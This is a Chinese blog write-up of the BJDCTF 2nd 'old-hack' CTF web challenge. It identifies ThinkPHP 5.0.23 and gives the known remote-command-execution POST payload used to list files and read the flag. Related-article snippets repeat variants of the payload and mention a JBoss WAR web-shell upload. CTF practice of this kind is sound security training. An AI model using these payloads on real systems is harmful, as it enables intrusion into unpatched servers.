[BJDCTF 2nd] web题-old-hack

最新推荐文章于 2021-09-26 00:04:03 发布
最新推荐文章于 2021-09-26 00:04:03 发布
阅读量339 收藏
点赞数 1
分类专栏: CTF练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BROTHERYY/article/details/107311793
版权

复现环境:buuoj.cn

在这里插入图片描述
发现是thinkphp5,让页面报错找到了具体的版本号。
在这里插入图片描述
上网找了这个漏洞的payload

POST:_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls /

使用hackbar的post传递这个参数进去,查看根目录下的文件

在这里插入图片描述
读取flag
在这里插入图片描述flag{dc909607-e27c-40a9-86e8-2de6079ed503}

BROTHERYY
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2.BJDCTF(2020第二届)——Misc杂项
qwsn
04-02 4367
2.BJDCTF(2020第二届)——Misc杂项 0x01.目统计 第一:[BJDCTF 2nd]最简单的misc-y1ng (1)目 (2)解压附件得到的压缩包,发现需要密码,我们使用Ziperello暴力破解zip压缩包软件,读取压缩包,发现没有加密的文件;(猜测是伪加密) (3)伪加密解密即可:java -jar ZipCenOp.jar r xxx.zip 解密 (4...
Web Hacking 101 中文版
10-05
Web Hacking 101 中文版 (ePub格式) 原书:Hack, Learn, Earn, with a Free E-Book ---------------------------------------------------- 本 ePub 基于开源文档,目录书签齐全。 版权归原作者,翻译版权归译者。 ----------------------------------------------------
【学习笔记14】buu [BJDCTF 2nd]old-hack
weixin_43553654的博客
05-14 326
首先打开网站一看,映入眼球,thinkphp,但是不知道是什么版本的所以就想办法构造一个报错来让它显示一些更详细的信息http://59429912-fc6a-4d2d-945a-c1aabf47f19f.node3.buuoj.cn/?s=3 这样就可以看到thinkphp的版本了是5.0.23版本接下来就简单了求助度娘,查找thinkphp5.0.23对应版本的漏洞最后在...
[BJDCTF 2nd]old-hack 1
feng的博客
11-12 1036
WP 一道直接利用thinkphp的RCE洞的目。 首先进入环境,得知这是一个thinkphp5,通过输入?s=1来报错,获得版本信息(是一个小姿势): tp5.0.23这个版本以及相近的版本以RCE而出名的,去网上搜一波payload,搜到了: ?s=1 _method=__construct&filter[]=system&server[REQUEST_METHOD]=ls / 直接打就可以执行。 不过我一开始执行的时候,光看到了 system(): Cannot execu
[BJDCTF 2nd]old-hack
夜幕下的灯火阑珊的博客
05-13 954
知识点 thinkphp 5.0.23 RCE漏洞 目提示thinkphp5 构造index.php?s=1报错看看 看到版本号为5.0.23,搜索一波5.0.23漏洞 ThinkPHP 5.0.0~5.0.23 RCE 漏洞分析 直接用payload打就是了
[BJDCTF 2nd] old-hack
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-22 718
漏洞:ThinkPHP 5.0.23 RCE 参考https://www.codercto.com/a/54587.html http://ip_addr/index.php?s=captcha payload _method=__construct&filter[]=system&method=get&get[]=whoami
BJDCTF 2nd writeup(二)
01-21
文章目录Misc[BJDCTF 2nd]A_Beautiful_Picture[BJDCTF 2nd]小姐姐-y1ng[BJDCTF 2nd]TARGZ-y1ng[BJDCTF 2nd]Imagin – 开场曲Crypto[BJDCTF 2nd]cat_flag[BJDCTF 2nd]燕言燕语[BJDCTF 2nd]Y1nglish Misc [BJDCTF 2nd]...
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
Flask Web Development 2nd 完整版--网页直接生成的pdf
03-12
:“Flask Web Development 2nd 完整版--网页直接生成的pdf”,暗示这是一本关于使用Python语言开发Web应用程序的书籍,其完整版于2018年出版,作者是Miguel Grinberg。这本书专注于Flask框架,这是Python的一个...
BUUCTF old hack
zydbk123456的博客
04-26 627
1.打开页面,获取提示信息 打开页面,页面提示powered by Thinkphp。说明可能和thinkphp框架有关。也确实如此,这里用到了thinkphp5的远程命令执行漏洞。在用这个thinkphp的漏洞前,先了解一下有关thinkphp的一些基础知识: thinkphp是一个用来简化企业应用开发和敏捷WEB应用的php框架。thinkphp包含了底层架构、兼容处理、基类库、数据库访问...
[BJDCTF 2nd]old-hack -wp
freerats的博客
07-04 374
进入网站,看到提示,powered By THINKPHP5 知道肯定与thinkphp5有关 传入一个s=1报错查看一下信息(这里要遇见过才知道,没什么技巧) 版本为50.0.23 post提交 _method=__construct&filter[]=system&server[REQUEST_METHOD]=ls / 触发命令执行漏洞 cat /flag ...
CTF_Web:长安杯-2021 Old But A Little New & asuka
AFCC_的博客(Web_Dog)
09-26 2281
0x00目描述 目只考一个内容,就是Jboss后台上传war包getshell。 首先是一个jboss页面。 后面的wiki等等连接都在jboss的官网,与本没有关系。 0x01 弱口令登录 第一个路径admin-console,管理员控制台可以直接使用admin、admin的弱口令登录,在后台中找到部署war包的地方上传。 0x02 上传war包getshell 在这里使用的是TsengYUen的回显jsp一句话,然后使用命令打包。 jar cvf shell.war 1.jsp 一句话的内容为
Web-7(25-28)-BUUCTF平台
~airrudder~
04-11 5097
本篇内容 [BJDCTF 2nd]old-hack [BUUCTF 2018]Online Tool [0CTF 2016]piapiapia [ACTF2020 新生赛]Include 上一篇 | 目录 | 下一篇 [BJDCTF 2nd]old-hack 发现是thinkphp5漏洞,使用Kali查一下漏洞利用方法: 我们查看一下最新的那个46150.txt,看看是否可以利用,在ka...
BJDCTF 2nd菜鸡做记录
bmth666的博客
03-25 3216
文章目录 萌新赛 做了一下web,感觉还没有入门,太难了吧,然后看大佬博客把能写的复现一下 [BJDCTF 2nd]简单注入 这道没写出来,想了好久才想到可以用\转义掉',然后就开始盲注,发现禁用了select,尝试绕过未果,卡死,看师傅文章才发现可以正则匹配出password,妙呀,先写一下我的思路 username=\ password=...
[原复现]BJDCTF2020 WEB部分全部解
笑花大王
03-30 1410
简介 原复现:https://gitee.com/xiaohua1998/BJDCTF2020_January 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此 1.Easy MD5 1.涉及知识点:md5函数特性绕过、SQL注入 md5() md5() 函数计算字符串的 MD5 散列。 m...
BJDCTF2020--web-复现
ChenZIDu的博客
02-21 2762
BJDCTF2020 未完待续 Buu ZJCTF,就这? 看到这名字还是很不爽的,毕竟我也是个浙江人,不过zjctf,有一说一确实。 BUU上和源好像有点差别。 进放出源码: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_g...
BUUCTF [BJDCTF2nd_duangshell]
veinard_F的博客
08-05 485
打开目后是 提示是swp文件泄露 payload .index.php.swp下载文件 拖到Linux上 用命令vi -r 加路径加文件 恢复文件 得到 (将文件拖到Linux上涉及到主机和虚拟机文件共享的问,需要在虚拟机设置上安装Vmware tools。) 观察上述代码可以发现 ...
[BJDCTF 2nd]假猪套天下第一
怪味巧克力的博客
07-16 501
0x01 拿到目进去,首页如下 我们如果以admin账号登录,会弹框提示我们不是admin 然后我们随意登录看看什么情况,结果可以登录进去,如下图 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FqDvqpgT-1594868368495)(https://img2020.cnblogs.com/blog/2010397/202007/2010397-20200716105521025-563704932.png)] 查看源码没有看到什么有价值的信息,我们重新登录抓包看
Core Python Programming (2nd Edition) - 英文原版
"Python核心编程英文第二版,由Wesley J. Chun撰写,是Python编程领域的...附带的练习和实例代码有助于读者巩固理论知识,提高实际编程能力。因此,《Python核心编程》第二版成为了一本被广泛推荐的Python学习资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值